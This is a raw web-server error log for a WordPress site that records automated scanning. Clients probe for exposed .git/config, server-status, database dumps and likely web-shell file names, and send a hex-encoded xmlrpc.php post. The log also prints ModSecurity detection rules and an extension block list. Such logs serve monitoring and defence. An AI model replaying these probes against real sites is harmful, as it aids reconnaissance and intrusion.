(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/02/24 07:43:08 [error] 27890#27890: *627070 access forbidden by rule, client: 45.148.10.186, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 24 07:48:27.197931 2025] [autoindex:error] [pid 29277:tid 140472198620928] [client 185.238.231.93:49490] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Mon Feb 24 07:48:32.574658 2025] [autoindex:error] [pid 27930:tid 140472198620928] [client 185.238.231.93:49502] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Mon Feb 24 07:48:45.121255 2025] [autoindex:error] [pid 27928:tid 140472156657408] [client 185.238.231.93:49530] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Feb 24 07:48:50.742112 2025] [autoindex:error] [pid 27930:tid 140472097908480] [client 185.238.231.93:49542] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 24 07:48:52.059997 2025] [autoindex:error] [pid 27930:tid 140472165050112] [client 185.238.231.93:49546] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Mon Feb 24 07:49:06.783926 2025] [autoindex:error] [pid 27930:tid 140472298673920] [client 185.238.231.93:49580] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Mon Feb 24 07:49:07.014512 2025] [:error] [pid 27928:tid 140472290281216] [client 185.238.231.93:49582] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Feb 24 07:49:09.448430 2025] [autoindex:error] [pid 27930:tid 140472139872000] [client 185.238.231.93:49588] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Mon Feb 24 07:49:11.906289 2025] [autoindex:error] [pid 27928:tid 140472148264704] [client 185.238.231.93:49594] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Mon Feb 24 07:49:26.758497 2025] [autoindex:error] [pid 27930:tid 140472131479296] [client 185.238.231.93:49630] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Feb 24 07:49:33.843466 2025] [autoindex:error] [pid 29277:tid 140472097908480] [client 185.238.231.93:49644] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Mon Feb 24 07:49:36.834097 2025] [autoindex:error] [pid 29277:tid 140472064337664] [client 185.238.231.93:49654] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Mon Feb 24 07:49:41.169742 2025] [autoindex:error] [pid 29277:tid 140472165050112] [client 185.238.231.93:49668] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Mon Feb 24 07:49:42.346904 2025] [autoindex:error] [pid 29277:tid 140472139872000] [client 185.238.231.93:49672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Mon Feb 24 07:49:44.586952 2025] [:error] [pid 27930:tid 140472307066624] [client 185.238.231.93:49678] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Feb 24 07:49:47.641800 2025] [autoindex:error] [pid 27930:tid 140472207013632] [client 185.238.231.93:49686] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Mon Feb 24 07:49:55.073196 2025] [autoindex:error] [pid 29277:tid 140472332244736] [client 185.238.231.93:49706] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Mon Feb 24 07:50:10.028081 2025] [autoindex:error] [pid 29277:tid 140472298673920] [client 185.238.231.93:49744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 24 07:50:20.514030 2025] [autoindex:error] [pid 27928:tid 140472340637440] [client 185.238.231.93:49766] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Mon Feb 24 07:50:35.354267 2025] [:error] [pid 27930:tid 140472123086592] [client 185.238.231.93:49796] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Feb 24 07:50:36.541058 2025] [autoindex:error] [pid 27930:tid 140472165050112] [client 185.238.231.93:49800] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Feb 24 07:50:54.750738 2025] [:error] [pid 27930:tid 140472139872000] [client 185.238.231.93:49840] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Feb 24 07:51:14.786275 2025] [:error] [pid 27930:tid 140472148264704] [client 185.238.231.93:49884] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Mon Feb 24 07:51:34.697361 2025] [autoindex:error] [pid 27929:tid 140472114693888] [client 185.238.231.93:49916] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Mon Feb 24 07:52:30.297065 2025] [:error] [pid 29277:tid 140472114693888] [client 185.238.231.93:50012] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Feb 24 08:22:23.372449 2025] [authz_core:error] [pid 29277:tid 140472173442816] [client 159.203.96.42:50438] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/24 08:22:27 [error] 27891#27891: *627719 access forbidden by rule, client: 159.203.96.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/24 08:37:54 [error] 27890#27890: *627857 access forbidden by rule, client: 45.148.10.186, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/24 09:59:25 [error] 27890#27890: *628617 access forbidden by rule, client: 13.209.47.72, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "INVESTIGACIONPERU.COM" [Mon Feb 24 10:01:27.606226 2025] [autoindex:error] [pid 27930:tid 140472097908480] [client 52.172.210.248:52016] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Feb 24 14:12:32.237935 2025] [authz_core:error] [pid 10657:tid 140472106301184] [client 164.92.244.132:59026] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/24 14:12:37 [error] 27891#27891: *633511 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 24 16:53:29.162423 2025] [:error] [pid 27929:tid 140472123086592] [client 185.193.157.179:34218] [client 185.193.157.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z7zqWTuJMvRC20fyFYT4GQAAAFE"] [Tue Feb 25 14:13:13.342199 2025] [:error] [pid 1156:tid 140056333383424] [client 45.184.239.167:36440] [client 45.184.239.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z74WSa0-GQygBrzDoNBZPAAAAIY"] [Tue Feb 25 16:44:31.398805 2025] [:error] [pid 1152:tid 140056316598016] [client 185.100.87.250:39268] [client 185.100.87.250] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql.sql"] [unique_id "Z745v7616QmWPZAcSq_GlwAAAAg"] [Tue Feb 25 16:44:32.074154 2025] [:error] [pid 1152:tid 140056224278272] [client 185.100.87.250:39270] [client 185.100.87.250] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/mysql.sql"] [unique_id "Z745wL616QmWPZAcSq_GmAAAABM"] [Tue Feb 25 17:23:33.207283 2025] [:error] [pid 2937:tid 140056418797312] [client 45.144.52.254:39860] [client 45.144.52.254] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/elmah.axd"] [unique_id "Z75C5cPowvo-Wa9Ao4ZofgAAAMQ"] [Tue Feb 25 18:00:39.031848 2025] [:error] [pid 1156:tid 140056452368128] [client 194.5.82.145:41044] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Tue Feb 25 18:00:39.031930 2025] [:error] [pid 1156:tid 140056452368128] [client 194.5.82.145:41044] Stack trace: [Tue Feb 25 18:00:39.031943 2025] [:error] [pid 1156:tid 140056452368128] [client 194.5.82.145:41044] #0 {main} [Tue Feb 25 18:00:39.032048 2025] [:error] [pid 1156:tid 140056452368128] [client 194.5.82.145:41044] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Tue Feb 25 18:00:54.537003 2025] [autoindex:error] [pid 1156:tid 140056257849088] [client 194.5.82.145:41106] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Tue Feb 25 18:01:01.009463 2025] [autoindex:error] [pid 2937:tid 140056324990720] [client 194.5.82.145:41134] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Tue Feb 25 18:01:15.378248 2025] [autoindex:error] [pid 1156:tid 140056241063680] [client 194.5.82.145:41194] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Feb 25 18:01:21.913541 2025] [autoindex:error] [pid 2937:tid 140056199100160] [client 194.5.82.145:41222] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 18:01:23.152475 2025] [autoindex:error] [pid 1156:tid 140056224278272] [client 194.5.82.145:41230] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Tue Feb 25 18:01:37.879007 2025] [autoindex:error] [pid 1153:tid 140056410404608] [client 194.5.82.145:41292] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Tue Feb 25 18:01:38.111128 2025] [:error] [pid 1156:tid 140056435582720] [client 194.5.82.145:41294] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Feb 25 18:01:40.470260 2025] [autoindex:error] [pid 2937:tid 140056435582720] [client 194.5.82.145:41310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Tue Feb 25 18:01:42.931971 2025] [autoindex:error] [pid 2937:tid 140056274634496] [client 194.5.82.145:41322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Tue Feb 25 18:01:59.122930 2025] [autoindex:error] [pid 1156:tid 140056190707456] [client 194.5.82.145:41396] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Tue Feb 25 18:02:06.593123 2025] [autoindex:error] [pid 2937:tid 140056316598016] [client 194.5.82.145:41428] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Tue Feb 25 18:02:10.465483 2025] [autoindex:error] [pid 2937:tid 140056283027200] [client 194.5.82.145:41450] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Feb 25 18:02:16.417791 2025] [autoindex:error] [pid 1153:tid 140056443975424] [client 194.5.82.145:41478] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Feb 25 18:02:18.024459 2025] [autoindex:error] [pid 1152:tid 140056224278272] [client 194.5.82.145:41486] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Tue Feb 25 18:02:21.211656 2025] [:error] [pid 2937:tid 140056215885568] [client 194.5.82.145:41500] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Feb 25 18:02:54.264526 2025] [autoindex:error] [pid 2937:tid 140056190707456] [client 194.5.82.145:41640] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Tue Feb 25 18:03:00.730373 2025] [autoindex:error] [pid 2937:tid 140056435582720] [client 194.5.82.145:41668] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Tue Feb 25 18:03:18.730303 2025] [autoindex:error] [pid 1153:tid 140056427190016] [client 194.5.82.145:41744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex 